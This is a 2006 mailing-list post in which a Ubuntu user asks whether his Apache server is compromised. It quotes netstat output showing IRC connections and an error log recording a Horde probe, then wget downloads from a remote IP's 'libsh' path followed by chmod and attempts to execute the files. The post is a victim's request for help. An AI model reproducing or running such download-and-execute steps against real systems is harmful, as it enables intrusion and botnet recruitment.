[H-GEN] apache2 compromised or just attempts?

Troy Piggins troy at piggo.com
Sun May 28 18:51:03 EDT 2006 

Few weeks ago I came home after a few days away and was having some problems
with my ubuntu server.  I noticed that the disk space was at 100% full.  Weird,
it is a 38Gb partition and has never been over 15% used.

After some scrounging around I found that my most recent apache2 error logs was
about 32Gb!  Looked like some turkey had been trying repeatedly, and
repeatedly, to hack my web server. [1]

I compressed that log file and the system worked fine again.

Yesterday the web server stopped working.  It is not showing up in 'pstree'.
Look at netstat and this is the (worrying) output:

-----8<-----
Active Internet connections (w/o servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 armadillo.p:netbios-ssn linus.piggo.local:rootd ESTABLISHED
tcp        0      0 localhost.localdo:51625 localhost.localdo:32769 ESTABLISHED
tcp        0      0 10.1.1.11:43404         zagreb.hr.eu.under:ircd ESTABLISHED
tcp        0      0 10.1.1.11:43411         zagreb.hr.eu.under:ircd ESTABLISHED
tcp        0      0 10.1.1.11:55893         lemming.euronet.nl:ircd ESTABLISHED
tcp        0      0 10.1.1.11:47631         checkip.chi.dyndns.:www CLOSE_WAIT
tcp        0      0 localhost.localdo:32769 localhost.localdo:51625 ESTABLISHED
tcp        0      0 10.1.1.11:33570         oslo2.no.eu.undern:6669 ESTABLISHED
tcp        1      0 armadillo.piggo.d:49430 armadillo.piggo.dy:nntp CLOSE_WAIT
[snip]
-----8<-----

10.1.1.11 is my ubuntu machine's ip address of it's wireless card connection to
my wireless modem/router.

What the hell are those ircd entries?  Am I compromised?  What is my next step?

[1] extract of /var/log/apache1/error.log.4.gz

-----8<-----
[Mon May 01 15:38:10 2006] [error] [client 216.65.11.137] script
'/var/www/thisd
oesnotexistahaha.php' not found or unable to stat
[Mon May 01 15:38:12 2006] [error] [client 216.65.11.137] File does not exist:
/
var/www/horde-cvs
[Mon May 01 15:38:12 2006] [error] [client 216.65.11.137] File does not exist:
/
var/www/pub/horde-cvs
--20:41:57--  http://81.58.26.26/libsh/ping.txt
           => `ping.txt'
Connecting to 81.58.26.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 358 [text/plain]
ping.txt: Permission denied

Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
        LANGUAGE = "en_US",
        LC_ALL = (unset),
        LANG = "en_US"
    are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
Can't open perl script "temp2006": No such file or directory
--20:41:57--  http://81.58.26.26/libsh/ping
           => `ping'
Connecting to 81.58.26.26:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,808 (15K) [text/plain]
ping: Permission denied

Cannot write to `ping' (Permission denied).
chmod: invalid mode string: `x'
sh: ./ping: No such file or directory
sh: curl: command not found
-----8<-----

-- 
Troy Piggins
  ,-o    Ubuntu v5.10 (Breezy Badger): kernel 2.6.12-10-k7,
 o   )   postfix 2.2.4, procmail 3.22, mutt 1.5.11i,
  `-o    slrn 0.9.8.1/rt (score_color patch), vim 7.0

More information about the General mailing list